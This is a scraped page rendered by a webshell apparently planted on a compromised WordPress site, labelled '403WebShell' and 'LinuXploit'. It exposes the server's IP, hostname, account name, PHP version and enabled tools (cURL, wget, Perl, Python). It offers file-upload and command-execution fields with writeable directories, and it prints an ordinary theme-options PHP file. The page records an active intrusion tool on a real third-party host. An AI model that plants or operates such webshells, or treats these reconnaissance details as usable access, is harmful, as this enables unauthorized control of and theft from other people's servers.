Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.217.241.235
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/tacafoundation.org/wp-content/themes/charite/inc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/tacafoundation.org/wp-content/themes/charite/inc//get-theme-options.php
<?php

/**
 *
 * Get option
 *
 * @since 1.0.0
 * @version 1.0.0
 *
 */
if (!function_exists('charite_get_option')) {
	function charite_get_option($option = '', $default = null)
	{
		$options = get_option('charite_theme_options'); // Attention: Set your unique id of the framework

		return (isset($options[$option])) ? $options[$option] : $default;
	}
}


if (!function_exists('charite_switcher_option')) {

	function charite_switcher_option($option = '', $default = null)
	{
		$options    = get_option('charite_theme_options'); // Attention: Set your unique id of the framework
		$return_val = (isset($options[$option])) ? $options[$option] : $default;
		$return_val = ('1' == $return_val) ? true : false;

		return $return_val;
	}
}

/**
 *
 * Get customize option
 *
 * @since 1.0.0
 * @version 1.0.0
 *
 */

if (!function_exists('charite_get_customize_option')) {

	function charite_get_customize_option($option = '', $default = null)
	{
		$options = get_option('charite_customize_options'); // Attention: Set your unique id of the framework

		return (isset($options[$option])) ? $options[$option] : $default;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit